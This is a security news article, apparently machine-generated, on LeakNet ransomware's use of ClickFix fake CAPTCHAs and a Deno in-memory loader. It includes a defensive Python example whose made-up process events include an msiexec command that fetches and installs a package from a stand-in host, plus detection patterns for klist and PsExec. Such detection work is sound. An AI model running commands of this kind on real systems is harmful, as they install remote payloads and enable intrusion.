

Ethical Hacking News

LeakNet Ransomware Exploits ClickFix Social Engineering Tactics to Deploy Deno In-Memory Loader

  • The cybersecurity landscape is evolving with new threat actors emerging and innovative social engineering tactics like ClickFix being adopted by ransomware operations.
  • LeakNet, a ransomware operation, has adopted the ClickFix technique as an initial access method, tricking users into running malicious commands through compromised websites.
  • The use of ClickFix offers advantages to threat actors, including reduced dependence on third-party suppliers and lower per-victim acquisition cost.
  • LeakNet's attack vector involves a Deno-based loader, DLL side-loading, PsExec, data exfiltration, and encryption, making it challenging for defenders to detect the malicious activity.
  • The attackers also use S3 buckets for staging and exfiltration, reducing their detection footprint.
  • The emergence of LeakNet highlights the need for organizations to stay vigilant and implement robust security measures against such attacks.



    The cybersecurity landscape is constantly evolving, with new threat actors emerging and traditional methods of attack being replaced by innovative social engineering tactics. One such example is the recent adoption of the ClickFix social engineering technique by the ransomware operation known as LeakNet. This tactic, which has been gaining traction among threat actors in recent months, involves tricking users into manually running malicious commands to address non-existent errors delivered through compromised websites.

    According to a recent report published by ReliaQuest, a cybersecurity company that specializes in threat intelligence, LeakNet has adopted the ClickFix technique as an initial access method. This is a significant departure from traditional methods of ransomware deployment, which often rely on stolen credentials or exploited vulnerabilities. Instead, LeakNet uses legitimate-but-compromised websites to serve fake CAPTCHA verification checks that instruct users to copy and paste a "msiexec.exe" command to the Windows Run dialog.

    The use of ClickFix offers several advantages to threat actors, including reduced dependence on third-party suppliers, lower per-victim acquisition cost, and eliminated operational bottlenecks. Furthermore, this tactic is not confined to a specific industry vertical, but rather casts a wide net to infect as many victims as possible. This approach has already shown its effectiveness, with LeakNet reported to have targeted industrial entities and other organizations across various sectors.

    In addition to the use of ClickFix, LeakNet also employs a Deno-based loader to execute Base64-encoded JavaScript directly in memory. This approach minimizes on-disk evidence and makes it more difficult for defenders to detect the malicious activity. The payload is designed to fingerprint the compromised system, contact an external server to fetch next-stage malware, and enter into a polling loop that repeatedly fetches and executes additional code through Deno.

    The post-compromise activity of LeakNet follows a consistent methodology, which involves using DLL side-loading to launch a malicious DLL delivered via the loader. The attacker then uses PsExec to execute further malicious payloads, followed by data exfiltration and encryption. In some cases, LeakNet also runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on the compromised system.
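The behaviours described above (a Run-dialog msiexec.exe launch, Deno carrying encoded JavaScript, klist, PsExec) lend themselves to host-level correlation over process-creation logs. The following is an added example, not code from ReliaQuest's report or this article; the event fields, rule names, heuristics and threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Constructed process-creation events (fields loosely follow Sysmon Event ID 1).
# Hosts, URL and command lines are invented for illustration only.
EVENTS = [
    {"host": "WS-01", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i https://cdn.example.invalid/verify.msi /qn"},
    {"host": "WS-01", "parent": "msiexec.exe", "image": "deno.exe",
     "cmdline": "deno.exe " + "QUJD" * 40},  # placeholder encoded argument
    {"host": "WS-01", "parent": "deno.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c klist"},
    {"host": "WS-01", "parent": "cmd.exe", "image": "PsExec.exe",
     "cmdline": "PsExec.exe \\\\SRV-02 cmd.exe"},
    {"host": "WS-07", "parent": "services.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /V"},
    {"host": "WS-07", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c klist"},
]

URL = re.compile(r"https?://", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")  # long encoded argument
KLIST = re.compile(r"\bklist\b", re.I)

def match_rules(event):
    """Return the names of the behavioural rules (assumed heuristics) an event hits."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    hits = []
    # Run-dialog launches are children of explorer.exe; a remote package
    # reference is the assumed indicator here.
    if image == "msiexec.exe" and parent == "explorer.exe" and URL.search(cmd):
        hits.append("clickfix_msiexec")
    # Deno on an endpoint carrying a long Base64-looking argument.
    if image == "deno.exe" and B64_RUN.search(cmd):
        hits.append("deno_encoded")
    # Weak signal alone: admins run klist too, so it only counts in combination.
    if KLIST.search(cmd):
        hits.append("klist_recon")
    if re.fullmatch(r"psexec(64)?\.exe", image):
        hits.append("psexec")
    return hits

def correlate(events, threshold=2):
    """Group hits per host; report hosts with at least `threshold` distinct rules."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(match_rules(ev))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}

if __name__ == "__main__":
    for host, rules in correlate(EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Requiring two or more distinct rules per host keeps a lone klist or a service-initiated msiexec.exe from alerting, while the full chain on one workstation does.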

    LeakNet's use of S3 buckets for staging and exfiltration is another notable aspect of its attack vector. By exploiting the appearance of normal cloud traffic, the attackers reduce their detection footprint and make it more challenging for defenders to identify and block the malicious activity.

    The emergence of LeakNet as a major ransomware operation has significant implications for organizations across various sectors. With the increasing sophistication of threat actors and the adoption of innovative tactics like ClickFix, it is essential for companies to stay vigilant and implement robust security measures to protect themselves against such attacks.

    According to Google's Threat Intelligence Group (GTIG), the top 10 ransomware brands with the most victims claimed on their data leak sites include Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi. The group also reported that in a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls.

    Furthermore, Google's GTIG noted that 77% of analyzed ransomware intrusions included suspected data theft, an increase from 57% in 2024. Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. However, at least some threat actors are shifting their targeting calculus away from large companies to focus on higher volume attacks against smaller organizations.

    In conclusion, the adoption of ClickFix social engineering tactics by LeakNet represents a significant shift in how threat actors carry out ransomware operations. The tactic offers several advantages and is already proving effective at infecting victims across various sectors. It is therefore essential for organizations to stay vigilant and implement robust security measures to protect themselves against such attacks.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/LeakNet-Ransomware-Exploits-ClickFix-Social-Engineering-Tactics-to-Deploy-Deno-In-Memory-Loader-ehn.shtml

  • https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html


  • Published: Tue Mar 17 10:44:24 2026 by llama3.2 3B Q4_K_M












